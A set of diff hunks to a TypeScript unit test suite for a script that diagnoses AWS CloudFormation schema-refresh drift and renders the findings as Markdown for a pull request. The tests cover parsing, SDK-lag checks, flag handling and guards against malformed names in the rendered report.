+    }
   };
 
   it('reports a clean refresh as clean', () => {
@@ -1142,6 +1233,17 @@ describe('the script end to end', () => {
     );
     expect(md).toContain('FAILED in a mode this report cannot read');
     expect(md).not.toContain('Nothing in this refresh needs a decision — additions only');
+  }, 60_000);
+
+  it('treats an UNREADABLE exit code as a failure, not as success', () => {
+    // Both arms of the flag reader used to return 0 — "the checker succeeded" —
+    // so a mistyped value silently restored the behaviour where a checker that
+    // never ran renders as "additions only".
+    expect(run('', 'not-a-number')).toContain('FAILED in a mode this report cannot read');
+    // The ABSENT flag stays 0 on purpose: this script is also run by hand, and
+    // refusing every manual invocation is not a safety property. The workflow
+    // dropping the flag is guarded in the workflow test instead.
+    expect(run('')).toContain('Nothing in this refresh needs a decision');
   }, 60_000);
 
   it('renders a case-divergence without asking npm anything', () => {

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -24,7 +24,7 @@
  * makes.
  */
 import { describe, it, expect } from 'vite-plus/test';
-import { execFileSync } from 'node:child_process';
+import { execFileSync, spawnSync } from 'node:child_process';
 import { mkdtempSync, readFileSync, readdirSync, rmSync, writeFileSync } from 'node:fs';
 import { tmpdir } from 'node:os';
 import { join, dirname } from 'node:path';
@@ -1577,11 +1577,24 @@ describe('the script end to end', () => {
     // readers and 0 — "the checker succeeded" — for the status one. Only the
     // workflow's space form held it shut, and the fence for that accepted
     // `--skipped-log=...` as well.
-    const glued = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+    // All THREE readers, each through its own flag — the title said "every
+    // reader" while only `readArgValue` was exercised, so a per-reader
+    // regression would have passed.
+    const list = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
       '--failed-checks=property-coverage',
     ]);
-    expect(glued).toContain('property-coverage');
-    expect(glued).not.toContain('Nothing in this refresh needs a decision');
+    expect(list).toContain('property-coverage');
+    expect(list).not.toContain('Nothing in this refresh needs a decision');
+
+    // `readNumArg`: a non-zero status with nothing parsed is a failure.
+    const status = run('', undefined, ['--nested-key-rc=2']);
+    expect(status).toContain('could not read');
+
+    // `readArg`: a path that does not exist is refused, not read as empty.
+    const path = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+      '--skipped-log=/no/such/path.log',
+    ]);
+    expect(path).toContain('which does not exist');
   }, 60_000);
 
   it('refuses a SINGLE-dash token where a value was expected', () => {
@@ -1674,6 +1687,22 @@ describe('the script end to end', () => {
       '/dev/null',
     ]);
     expect(md).not.toContain('unrecognized flag');
+  }, 60_000);
+
+  it('refuses a flag given more than once, in every spelling', () => {
+    // `rawArg` takes the FIRST match, so the later value is silently discarded
+    // — `--nested-key-rc 0 --nested-key-rc 3` rendered the clean verdict over
+    // an rc=3 checker. It was the last argv shape that still reached a
+    // confident answer.
+    for (const argv of [
+      ['--nested-key-rc', '0', '--nested-key-rc', '3'],
+      ['--nested-key-rc=0', '--nested-key-rc=3'],
+      ['--nested-key-rc', '0', '--nested-key-rc=3'],
+    ]) {
+      const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, argv);
+      expect(md, `accepted ${argv.join(' ')}`).toContain('given more than once');
+      expect(md).not.toContain('Nothing in this refresh needs a decision');
+    }
   }, 60_000);
 
   it('renders a case-divergence without asking npm anything', () => {
@@ -1979,4 +2008,28 @@ describe('the script\u2019s own synopsis', () => {
     }
   });
 
+});
+
+describe('the sibling type declarations', () => {
+  it('type-checks on their own', () => {
+    // Nothing in CI type-checks `scripts/**`: `tsconfig.json` includes only
+    // `src/**` + `types/**`, and `tsconfig.test.json` takes `scripts/**\/*.ts`,
+    // not `.d.mts`. A duplicated `KNOWN_FLAGS` declaration therefore sat in
+    // this file until review found it by running tsc by hand — and
+    // `skipLibCheck` hides exactly that class.
+    const out = spawnSync(
+      'npx',
+      [
+        'tsc',
+        '--ignoreConfig',
+        '--noEmit',
+        '--skipLibCheck',
+        'false',
+        join(REPO_ROOT, 'scripts/diagnose-schema-refresh.d.mts'),
+      ],
+      { encoding: 'utf8' }
+    );
+    expect(`${out.stdout}${out.stderr}`.trim(), 'the declarations do not type-check').toBe('');
+    expect(out.status).toBe(0);
+  }, 120_000);
 });

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -1,0 +1,532 @@
+/**
+ * The refresh pull request's own diagnosis — `scripts/diagnose-schema-refresh.mjs`.
+ *
+ * The job opens a PR that may be RED by design, and before this script the PR
+ * said only that such a class exists: finding out which property, on which
+ * type, declared where, meant reading two checkers' CI output. All of that is
+ * mechanical, so it is computed and written into the PR.
+ *
+ * The suite is shaped by the two ways this script can be WORSE than saying
+ * nothing, both of which it did during development against real drift:
+ *
+ * 1. **A confident wrong answer.** Looking a property name up across every
+ *    provider made `AWS::CodeCommit::Repository.Id` report evidence from
+ *    `@aws-sdk/client-cloudfront`, because that file sorted first. Lookups are
+ *    now scoped to the provider that actually serves the type.
+ * 2. **A silent empty.** The declared-property parse missed `new Set<string>([`
+ *    and returned nothing, which filtered every removal away and rendered
+ *    "nothing needs a decision" over a PR that did. That parse now refuses to
+ *    return an empty map for a non-empty module.
+ *
+ * Both are pinned below, and the real-repo cases are anchored on the actual
+ * `register-providers.ts` and the actual generated coverage module, because a
+ * synthetic fixture for either would encode the same assumption the parser
+ * makes.
+ */
+import { describe, it, expect } from 'vite-plus/test';
+import { readFileSync } from 'node:fs';
+import { join, dirname } from 'node:path';
+import { fileURLToPath } from 'node:url';
+import {
+  comparePropertySets,
+  findDeclarationCandidates,
+  mapTypesToProviderFiles,
+  parseDeclaredProperties,
+  parseNestedKeyDivergences,
+  renderDiagnosis,
+  sdkModelsMember,
+  sdkVersionLag,
+} from '../../../scripts/diagnose-schema-refresh.mjs';
+
+const REPO_ROOT = join(dirname(fileURLToPath(import.meta.url)), '..', '..', '..');
+
+const fixture = (properties: string[], readOnly: string[] = []) =>
+  JSON.stringify({
+    resourceType: 'AWS::Test::Type',
+    generatedAt: '2026-01-01',
+    properties,
+    readOnlyProperties: readOnly,
+  });
+
+describe('comparePropertySets', () => {
+  it('separates removals, additions, and the writable subset of additions', () => {
+    // The writable split is the load-bearing one: a read-only addition can
+    // never be a dropped value, because there was nothing to send.
+    const delta = comparePropertySets(
+      fixture(['Keep', 'Gone']),
+      fixture(['Keep', 'NewWritable', 'NewReadOnly'], ['NewReadOnly'])
+    );
+    expect(delta.removed).toEqual(['Gone']);
+    expect(delta.added).toEqual(['NewWritable', 'NewReadOnly']);
+    expect(delta.writableAdded).toEqual(['NewWritable']);
+  });
+
+  it('reports nothing for an unchanged type', () => {
+    const delta = comparePropertySets(fixture(['A']), fixture(['A']));
+    expect(delta).toEqual({ removed: [], added: [], writableAdded: [] });
+  });
+});
+
+describe('parseNestedKeyDivergences', () => {
+  it('picks out the checker’s own finding lines and keeps them verbatim', () => {
+    const out = parseNestedKeyDivergences(
+      [
+        'nested-key-coverage: FAILED',
+        '  AWS::Glue::Connection: OAuth2Credentials [definition-member-missing] (SDK interface `OAuth2Properties` has no member)',
+        '  AWS::ECS::Service: someKey [case-divergence] (SDK models `SomeKey`)',
+        'some unrelated trailing line',
+      ].join('\n')
+    );
+    expect(out).toHaveLength(2);
+    expect(out[0]!.resourceType).toBe('AWS::Glue::Connection');
+    expect(out[0]!.bucket).toBe('definition-member-missing');
+    // Verbatim: the checker's wording is the authority, not a paraphrase.
+    expect(out[0]!.line).toContain('has no member');
+    expect(out[1]!.bucket).toBe('case-divergence');
+  });
+
+  it('returns nothing for output with no findings', () => {
+    expect(parseNestedKeyDivergences('nested-key-coverage: OK — 0 divergences')).toEqual([]);
+  });
+
+  it('REFUSES to report nothing from output that says it FAILED', () => {
+    // The finding-line format lives in another file and nothing fences the two.
+    // A wording change there would silently make this return [] and render
+    // "nothing needs a decision" over a red check.
+    expect(() =>
+      parseNestedKeyDivergences('nested-key-coverage: FAIL — nested CFn->SDK key divergence\n')
+    ).toThrow(/output format changed/);
+  });
+});
+
+describe('parseDeclaredProperties', () => {
+  const REAL_GENERATED = join(REPO_ROOT, 'src/provisioning/property-coverage.generated.ts');
+
+  it('reads the REAL generated module, including its `new Set<string>([` shape', () => {
+    // Anchored on the real module: a synthetic sample would be written to match
+    // whatever the parser expects, which is exactly how the `<string>` type
+    // argument was missed.
+    const declared = parseDeclaredProperties(readFileSync(REAL_GENERATED, 'utf8'));
+    expect(declared.size).toBeGreaterThan(100);
+    const route53 = declared.get('AWS::Route53::RecordSet');
+    expect(route53, 'AWS::Route53::RecordSet left the generated table').toBeDefined();
+    expect(route53!.has('AliasTarget')).toBe(true);
+  });
+
+  it('REFUSES a non-empty module it parsed nothing from', () => {
+    // The failure that shipped for one revision. An empty map here filters
+    // every removal away and renders "nothing needs a decision" over a PR that
+    // does — worse than crashing, because it reads as a clean report.
+    expect(() => parseDeclaredProperties('export const X = 1;\n')).toThrow(
+      /parsed to zero types/
+    );
+  });
+
+  it('returns an empty map for genuinely empty input, without throwing', () => {
+    expect(parseDeclaredProperties('').size).toBe(0);
+  });
+});
+
+describe('mapTypesToProviderFiles', () => {
+  const REAL_REGISTER = join(REPO_ROOT, 'src/provisioning/register-providers.ts');
+
+  it('resolves both registration shapes against the REAL registration file', () => {
+    const map = mapTypesToProviderFiles(readFileSync(REAL_REGISTER, 'utf8'));
+    expect(map.size).toBeGreaterThan(100);
+    // Registered from a shared local (`const route53Provider = new Route53Provider()`).
+    expect(map.get('AWS::Route53::RecordSet')).toBe(
+      'src/provisioning/providers/route53-provider.ts'
+    );
+    // Registered with a fresh instance inline.
+    expect(map.get('AWS::CodeCommit::Repository')).toBe(
+      'src/provisioning/providers/codecommit-repository-provider.ts'
+    );
+  });
+
+  it('returns nothing for a source with no registrations', () => {
+    expect(mapTypesToProviderFiles('export function registerAllProviders() {}').size).toBe(0);
+  });
+});
+
+describe('findDeclarationCandidates', () => {
+  it('is scoped to the provider serving the type, not the whole directory', () => {
+    // The confident-wrong-answer case. Unscoped, `Id` matched 50+ lines across
+    // 20 providers; scoped, it can only report the file that owns the type.
+    const hits = findDeclarationCandidates(
+      'GeoProximityLocation',
+      'src/provisioning/providers/route53-provider.ts',
+      'AWS::Route53::RecordSet',
+      REPO_ROOT
+    );
+    expect(hits.length).toBeGreaterThan(0);
+    for (const hit of hits) {
+      expect(hit.startsWith('src/provisioning/providers/route53-provider.ts:')).toBe(true);
+    }
+  });
+
+  it('returns nothing rather than guessing when the owning provider is unknown', () => {
+    expect(findDeclarationCandidates('Whatever', undefined, undefined, REPO_ROOT)).toEqual([]);
+  });
+
+  it('scopes to the TYPE block inside a provider file serving several types', () => {
+    // 17 provider files serve more than one type; `ec2-provider.ts` serves 15.
+    // Unscoped, asking about `Tags` on one Glue type returned every `'Tags'` in
+    // the file, including other Glue types' declarations.
+    const scoped = findDeclarationCandidates(
+      'Tags',
+      'src/provisioning/providers/glue-provider.ts',
+      'AWS::Glue::Connection',
+      REPO_ROOT
+    );
+    const unscoped = findDeclarationCandidates(
+      'Tags',
+      'src/provisioning/providers/glue-provider.ts',
+      undefined,
+      REPO_ROOT
+    );
+    expect(unscoped.length).toBeGreaterThan(5);
+    expect(scoped.length).toBeLessThan(unscoped.length);
+  });
+});
+
+describe('sdkModelsMember', () => {
+  it('consults the client the OWNING provider imports', () => {
+    const evidence = sdkModelsMember(
+      'GeoProximityLocation',
+      'src/provisioning/providers/route53-provider.ts',
+      REPO_ROOT
+    );
+    expect(evidence, 'no SDK client resolved for the Route53 provider').toBeDefined();
+    // The whole point of deriving the client from the provider's own imports:
+    // CFn spells it `Route53`, the SDK spells it `route-53`, and no
+    // hand-maintained table is involved.
+    expect(evidence!.client).toBe('@aws-sdk/client-route-53');
+    expect(evidence!.modelled).toBe(true);
+  });
+
+  it('reports NOT modelled for a name no client carries', () => {
+    const evidence = sdkModelsMember(
+      'CdkdDefinitelyNotAnSdkMemberName',
+      'src/provisioning/providers/route53-provider.ts',
+      REPO_ROOT
+    );
+    expect(evidence!.modelled).toBe(false);
+  });
+
+  it('is CASE-INSENSITIVE — the defect that leaned toward deleting a live declaration', () => {
+    // A real-repo anchor, not a synthetic one: `@aws-sdk/client-api-gateway`
+    // spells the member `restApiId` and carries no PascalCase spelling anywhere
+    // in its models. Case-sensitively, `RestApiId` came back `modelled: false`,
+    // and the report then said both of AWS's descriptions had dropped it —
+    // encouraging deletion of a property the API very much still takes.
+    const evidence = sdkModelsMember(
+      'RestApiId',
+      'src/provisioning/providers/apigateway-provider.ts',
+      REPO_ROOT
+    );
+    expect(evidence, 'no SDK client resolved for the API Gateway provider').toBeDefined();
+    expect(evidence!.modelled).toBe(true);
+  });
+
+  it('consults EVERY imported client, not just the first', () => {
+    // 14 provider files import 2-4 clients. Reading the first is only
+    // coincidentally right today, and an import reformat would flip the
+    // evidence to the wrong service silently — the first defect returning
+    // through a side door.
+    // A name present in NO client, so the scan cannot stop at the first —
+    // `consulted` then records everything it actually looked at.
+    const evidence = sdkModelsMember(
+      'CdkdNoSuchMemberAnywhere',
+      'src/provisioning/providers/lambda-function-provider.ts',
+      REPO_ROOT
+    );
+    expect(evidence!.modelled).toBe(false);
+    expect(evidence!.consulted!.length).toBeGreaterThan(1);
+  });
+
+  it('refuses a property name it would have to rewrite to search for', () => {
+    // Scrubbing non-alphanumerics turns the needle into a different question.
+    expect(
+      sdkModelsMember('Foo.Bar', 'src/provisioning/providers/route53-provider.ts', REPO_ROOT)
+    ).toBeUndefined();
+  });
+
+  it('answers undefined rather than guessing when the provider is unknown', () => {
+    expect(sdkModelsMember('X', undefined, REPO_ROOT)).toBeUndefined();
+  });
+});
+
+describe('sdkVersionLag', () => {
+  it('settles the lag question in both directions', () => {
+    // The one branch of the divergence decision that IS decidable: current
+    // means the lag reading is eliminated, not merely unlikely.
+    expect(sdkVersionLag('x', '3.1.0', () => '3.9.0\n')).toEqual({
+      installed: '3.1.0',
+      latest: '3.9.0',
+      behind: true,
+    });
+    expect(sdkVersionLag('x', '3.9.0', () => '3.9.0\n')!.behind).toBe(false);
+  });
+
+  it('degrades to silence on a network failure or junk answer', () => {
+    // A diagnosis must never fail the job it describes.
+    expect(
+      sdkVersionLag('x', '3.1.0', () => {
+        throw new Error('offline');
+      })
+    ).toBeUndefined();
+    expect(sdkVersionLag('x', '3.1.0', () => 'npm ERR! 404')).toBeUndefined();
+    expect(sdkVersionLag('x', undefined, () => '3.9.0')).toBeUndefined();
+  });
+});
+
+describe('renderDiagnosis', () => {
+  const removedEntry = {
+    resourceType: 'AWS::Route53::RecordSet',
+    properties: ['GeoProximityLocation'],
+    candidates: { GeoProximityLocation: ['src/provisioning/providers/route53-provider.ts:274'] },
+    sdk: {
+      GeoProximityLocation: {
+        client: '@aws-sdk/client-route-53',
+        modelled: true,
+        version: '3.1018.0',
+      },
+    },
+  };
+
+  it('names the property, the site, and which way the SDK evidence leans', () => {
+    const md = renderDiagnosis({
+      removed: [removedEntry],
+      writableAdded: [],
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).toContain('GeoProximityLocation');
+    expect(md).toContain('route53-provider.ts:274');
+    expect(md).toContain('@aws-sdk/client-route-53');
+    expect(md).toContain('still models this name');
+    expect(md).toContain('bogusTolerated');
+    expect(md).toContain('3.1018.0');
+  });
+
+  it('leans the other way — and warns about renames — when the SDK dropped it too', () => {
+    const md = renderDiagnosis({
+      removed: [
+        {
+          ...removedEntry,
+          sdk: { GeoProximityLocation: { client: '@aws-sdk/client-route-53', modelled: false } },
+        },
+      ],
+      writableAdded: [],
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).toContain('no longer models this name');
+    expect(md).toContain('retiring the declaration');
+    // A rename is indistinguishable here, and saying so is what keeps the
+    // evidence from reading as a verdict.
+    expect(md).toContain('rename would look identical');
+  });
+
+  it('says so plainly when no evidence could be gathered', () => {
+    const md = renderDiagnosis({
+      removed: [{ ...removedEntry, sdk: { GeoProximityLocation: undefined } }],
+      writableAdded: [],
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).toContain('SDK evidence: none');
+  });
+
+  it('flags a RENAME when the same refresh added a name to the same type', () => {
+    // The single most decisive signal available, and it was missed at first:
+    // a rename is a removal and an addition arriving TOGETHER, and both sides
+    // are in hand. Measured on real drift, `AWS::CodeCommit::Repository`
+    // dropped `Id` and gained `RepositoryId` in one cycle.
+    const md = renderDiagnosis({
+      removed: [
+        {
+          resourceType: 'AWS::CodeCommit::Repository',
+          properties: ['Id'],
+          candidates: { Id: ['src/provisioning/providers/codecommit-repository-provider.ts:10'] },
+          sdk: { Id: { client: '@aws-sdk/client-codecommit', modelled: false, version: '3.0.0' } },
+          renameCandidates: { Id: ['RepositoryId'] },
+        },
+      ],
+      writableAdded: [],
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).toContain('Likely a RENAME');
+    expect(md).toContain('RepositoryId');
+  });
+
+  it('does NOT call a READ-ONLY addition a rename', () => {
+    // A declaration cannot target a read-only property, so "point the
+    // declaration at the new name" would just produce the next bogus entry.
+    // The pairing is fed from writable additions only.
+    const md = renderDiagnosis({
+      removed: [{ ...removedEntry, renameCandidates: { GeoProximityLocation: [] } }],
+      writableAdded: [],
+      readOnlyAddedCount: 1,
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).not.toContain('Likely a RENAME');
+  });
+
+  it('does NOT claim a rename when the refresh added nothing to that type', () => {
+    const md = renderDiagnosis({
+      removed: [{ ...removedEntry, renameCandidates: { GeoProximityLocation: [] } }],
+      writableAdded: [],
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).not.toContain('Likely a RENAME');
+  });
+
+  it('carries the installed SDK version, since "not modelled" is only as current as it', () => {
+    const md = renderDiagnosis({
+      removed: [removedEntry],
+      writableAdded: [],
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).toContain('3.1018.0');
+  });
+
+  it('gives paste-able steps for BOTH classes, not just a classification', () => {
+    // A report that classifies without saying what to run has handed over a
+    // question, not the work.
+    const md = renderDiagnosis({
+      removed: [removedEntry],
+      writableAdded: [],
+      divergences: [
+        {
+          resourceType: 'AWS::Glue::Connection',
+          bucket: 'definition-member-missing',
+          line: 'AWS::Glue::Connection: X [definition-member-missing] (…)',
+        },
+      ],
+      skipped: [],
+    });
+    expect(md).toContain('aws cloudformation describe-type');
+    expect(md).toContain('vp test run property-coverage');
+    // The SDK-lag check is the step that answers the one question the evidence
+    // cannot; without it an allow-list entry can be added over a stale SDK.
+    expect(md).toContain('npm view @aws-sdk/client-');
+    expect(md).toContain('audit:nested-key-coverage:check');
+  });
+
+  it('says the lag reading is RULED OUT when the client is current', () => {
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [
+        { resourceType: 'AWS::Glue::Connection', bucket: 'no-sdk-member', line: 'x [no-sdk-member]' },
+      ],
+      skipped: [],
+      sdkLag: { client: '@aws-sdk/client-glue', installed: '3.9.0', latest: '3.9.0', behind: false },
+    });
+    expect(md).toContain('is current');
+    expect(md).toContain('ruled out');
+  });
+
+  it('says the lag reading is LIVE, without claiming a bump would fix it', () => {
+    // "Bumping would fix this" is not answerable by a name lookup — measured:
+    // the live Glue divergence names ARE present in both the installed and the
+    // latest client, because the checker's finding is interface-level.
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [
+        { resourceType: 'AWS::Glue::Connection', bucket: 'no-sdk-member', line: 'x [no-sdk-member]' },
+      ],
+      skipped: [],
+      sdkLag: { client: '@aws-sdk/client-glue', installed: '3.1018.0', latest: '3.1127.0', behind: true },
+    });
+    expect(md).toContain('3.1018.0');
+    expect(md).toContain('3.1127.0');
+    expect(md).toContain('LIVE');
+    expect(md).not.toContain('would fix');
+  });
+
+  it('omits the SDK-lag step when every divergence is a case-divergence', () => {
+    // There is no judgement in a case divergence — the SDK has the key under a
+    // different capitalisation — so the lag question does not arise.
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [
+        { resourceType: 'AWS::ECS::Service', bucket: 'case-divergence', line: 'AWS::ECS::Service: x [case-divergence]' },
+      ],
+      skipped: [],
+    });
+    expect(md).toContain('case-divergence` means the SDK models the key');
+    expect(md).not.toContain('npm view');
+  });
+
+  it('names read-only additions as needing nothing, since the diff still shows them', () => {
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      readOnlyAddedCount: 6,
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).toContain('Read-only properties AWS added (6)');
+    expect(md).toContain('nothing to do');
+  });
+
+  it('reports an additions-only cycle as needing no decision', () => {
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [{ resourceType: 'AWS::CloudWatch::Alarm', properties: ['WarmUpConfiguration'] }],
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).toContain('Nothing in this refresh needs a decision');
+    expect(md).toContain('WarmUpConfiguration');
+    expect(md).toContain('no decision needed');
+  });
+
+  it('always closes by saying the decision is deliberately not made', () => {
+    // Without this the report reads as a recommendation, which is exactly the
+    // reading the asymmetry argument exists to prevent.
+    for (const input of [
+      { removed: [removedEntry], writableAdded: [], divergences: [], skipped: [] },
+      { removed: [], writableAdded: [], divergences: [], skipped: [] },
+    ]) {
+      expect(renderDiagnosis(input)).toContain('deliberately not made here');
+    }
+  });
+
+  it('lists divergences verbatim and names both options', () => {
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [
+        {
+          resourceType: 'AWS::Glue::Connection',
+          bucket: 'definition-member-missing',
+          line: 'AWS::Glue::Connection: OAuth2Credentials [definition-member-missing] (…)',
+        },
+      ],
+      skipped: [],
+    });
+    expect(md).toContain('OAuth2Credentials');
+    expect(md).toContain('NESTED_KEY_ALLOW_LIST');
+    expect(md).toContain('installed');
+  });
+
+  it('lists types the public bundle does not carry', () => {
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [],
+      skipped: ['AWS::BedrockAgentCore::Browser'],
+    });
+    expect(md).toContain('AWS::BedrockAgentCore::Browser');
+    expect(md).toContain('Not refreshed');
+  });
+});

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -44,6 +44,7 @@ import {
   CHECK_GUIDANCE,
   KNOWN_FLAGS,
   classifyGitShowFailure,
+  assertFixtureFloor,
   collectFixtureDeltas,
   loadDeclaredProperties,
   UNREADABLE,
@@ -486,6 +487,24 @@ describe('pairRenames', () => {
     expect(pairRenames('Id', ['Tags', 'Name', 'CapacityProviderConfiguration'])).toEqual([]);
   });
 
+  it('is PREFIX/SUFFIX, not containment — the rule the rename signal rests on', () => {
+    // `CapacityProviderConfiguration` above cannot discriminate: it justifies
+    // itself with "`Id` is inside Prov-id-er", true only case-INsensitively,
+    // while `pairRenames` is case-sensitive — so reverting the rule to
+    // `includes()` left all 118 cases green. `ProviderIdentity` CONTAINS `Id`
+    // and neither starts nor ends with it, so it separates the two rules.
+    expect(
+      'CapacityProviderConfiguration'.includes('Id'),
+      'the old anchor still cannot discriminate'
+    ).toBe(false);
+    expect('ProviderIdentity'.includes('Id'), 'this anchor no longer contains the needle').toBe(
+      true
+    );
+    expect(pairRenames('Id', ['ProviderIdentity'])).toEqual([]);
+    // The accepted twin, so a rule that pairs NOTHING also fails.
+    expect(pairRenames('Id', ['RepositoryId', 'IdArn'])).toEqual(['RepositoryId', 'IdArn']);
+  });
+
   it('pairs nothing when the refresh added nothing writable', () => {
     // Read-only additions never reach here — a declaration cannot target one.
     expect(pairRenames('Id', [])).toEqual([]);
@@ -823,6 +842,9 @@ describe('the render guards, at every site that reaches Markdown', () => {
       // The unreadable section renders a name too, and adding a render site the
       // poison input cannot reach defeats this case's stated job.
       unreadable: ['AWS-X-Y`\n\n## Nothing in this refresh needs a decision.json'],
+      // The failed-check HEADING is a twelfth site; without an entry here it
+      // was pinned only against the wrong-guard swap, not against no guard.
+      failedChecks: [POISON_TYPE],
       skipped: [POISON],
       sdkLag: [
         {
@@ -858,7 +880,7 @@ describe('the render guards, at every site that reaches Markdown', () => {
     // writable-added type and its property list, the lag row's type, and the
     // skipped list.
     const rejections = (md.match(/\[(?:name|key) rejected: unexpected characters\]/g) ?? []).length;
-    expect(rejections, 'a call site is interpolating a bundle-derived name raw').toBe(11);
+    expect(rejections, 'a call site is interpolating a bundle-derived name raw').toBe(12);
     // `renderDetail` strips rather than rejects, so it needs its own witness:
     // the backtick it removes cannot appear in the rendered detail.
     expect(md, 'renderDetail was bypassed at its call site').not.toContain('SDK has `X`');
@@ -1648,6 +1670,49 @@ describe('the script end to end', () => {
     expect(md).not.toContain('failed to run');
   }, 60_000);
 
+  it('renders the "Not refreshed" section from a POPULATED skipped log', () => {
+    // Every other `--skipped-log` case is a refusal or `/dev/null`, so the
+    // parse turning the refresh log's tail into that section had no coverage:
+    // replacing its `^AWS::` filter with "any non-empty line" left all cases
+    // green.
+    const dir = mkdtempSync(join(tmpdir(), 'cdkd-skipped-'));
+    try {
+      const log = join(dir, 'skipped.log');
+      writeFileSync(
+        log,
+        [
+          'No entry in the public bundle for these registered types:',
+          '  AWS::BedrockAgentCore::Browser',
+          '  AWS::BedrockAgentCore::CodeInterpreter',
+          'some trailing prose',
+        ].join('\n')
+      );
+      const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+        '--skipped-log',
+        log,
+      ]);
+      expect(md).toContain('Not refreshed');
+      // Asserted against the BULLET lines only: the section's own prose
+      // legitimately contains the log header's wording, so a whole-body
+      // `not.toContain` fails on correct output.
+      const bullets = md
+        .split('\n')
+        .filter((l) => l.startsWith('- '))
+        .join('\n');
+      // The EXACT bullet set. A `not.toContain('No entry')` does not
+      // discriminate: `renderName` rejects a line with spaces, so a loosened
+      // filter renders the header and the prose as
+      // `**[name rejected: unexpected characters]**` and the header's words
+      // never appear. The guard masks the parse it sits downstream of.
+      expect(bullets.split('\n')).toEqual([
+        '- `AWS::BedrockAgentCore::Browser`',
+        '- `AWS::BedrockAgentCore::CodeInterpreter`',
+      ]);
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  }, 60_000);
+
   it('refuses a log path that is a DIRECTORY, naming the cause', () => {
     // It passes `existsSync` and throws `EISDIR` inside `readFileSync`, which
     // collapsed the whole report to the generic one-line failure. Every other
@@ -1948,7 +2013,23 @@ describe('the module\u2019s own doc comments', () => {
       // anything and both are correct as they are.
       const attaches = seenBlocks > 1 && !/@typedef/.test(body);
       const next = lines[i + 1] ?? '';
-      if (attaches && (next.trim() === '' || next.trim() === '/**')) {
+      // A docblock must be followed by a DECLARATION — which also catches a
+      // block followed by a stray comment or by non-declaration code, not only
+      // the blank-line and stacked-block shapes.
+      //
+      // BOUND, stated because an over-claimed fence is the thing this file
+      // keeps producing: it CANNOT see an undocumented declaration slipped
+      // BETWEEN a docblock and the function it describes. That shape still
+      // reads as "block, then a declaration", and telling the intended subject
+      // from an interloper needs more than the next line — a JSDoc block does
+      // not name what it documents. `tsc --checkJs` is the real control there
+      // (it caught two of this session's three orphan incidents through an
+      // implicit-any on a parameter that had lost its `@param`); this fence
+      // covers the shapes that produce no type error at all.
+      const declares = /^(export\s+)?(async\s+)?(function|class|const|let|var)\s/.test(
+        next.trim()
+      );
+      if (attaches && !declares) {
         orphans.push(`line ${i + 2}: ${JSON.stringify(next)}`);
       }
     }
@@ -2008,6 +2089,49 @@ describe('the script\u2019s own synopsis', () => {
     }
   });
 
+});
+
+describe('assertFixtureFloor', () => {
+  it('refuses an EMPTY listing rather than reporting from it', () => {
+    // The last input in the module without a floor. Empty yields empty
+    // removals AND empty additions, which renders as "additions only" — every
+    // sibling input already refuses a short read.
+    expect(() => assertFixtureFloor(0, 134)).toThrow(/no schema fixtures found/);
+  });
+
+  it('refuses a listing far short of the coverage table', () => {
+    expect(() => assertFixtureFloor(3, 134)).toThrow(/far short of the coverage table/);
+  });
+
+  it('is CALLED by main(), before the walk it guards', () => {
+    // The function is exercised directly above; the CALL SITE lives in `main()`
+    // and no seam reaches it — `FIXTURES_DIR` is derived from the repo root, so
+    // a spawn cannot be pointed at an empty directory. A source-shape
+    // assertion is the honest cover: it catches deletion, and says plainly
+    // that it does not exercise the behaviour.
+    const src = readFileSync(join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs'), 'utf8');
+    const floorAt = src.indexOf('assertFixtureFloor(fixtureFiles.length');
+    // The CALL, not the definition — `collectFixtureDeltas({` matches the
+    // function's own signature first, which sits far earlier in the file.
+    const walkAt = src.indexOf('} = collectFixtureDeltas({');
+    expect(floorAt, 'main() no longer calls the floor').toBeGreaterThan(-1);
+    expect(walkAt).toBeGreaterThan(-1);
+    expect(floorAt, 'the floor is checked after the walk it guards').toBeLessThan(walkAt);
+  });
+
+  it('accepts the real tree, and does not fire when the table is empty', () => {
+    // Bound to the DECLARED count rather than a constant: the two move
+    // together, so a hand-picked number goes stale. Driven by the real
+    // directory so a future refresh cannot silently cross the floor.
+    const files = readdirSync(join(REPO_ROOT, 'tests/fixtures/cfn-schemas')).filter(
+      (f) => f.endsWith('.json') && !f.startsWith('_')
+    );
+    const declared = loadDeclaredProperties();
+    expect(files.length).toBeGreaterThan(100);
+    expect(() => assertFixtureFloor(files.length, declared.size)).not.toThrow();
+    // A by-hand run against an unread coverage table must not trip the ratio.
+    expect(() => assertFixtureFloor(1, 0)).not.toThrow();
+  });
 });
 
 describe('the sibling type declarations', () => {

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -41,6 +41,7 @@ import {
   renderKey,
   renderLiteral,
   buildSdkLag,
+  collectFixtureDeltas,
   clientsForType,
   sdkClientVersions,
   renderDiagnosis,
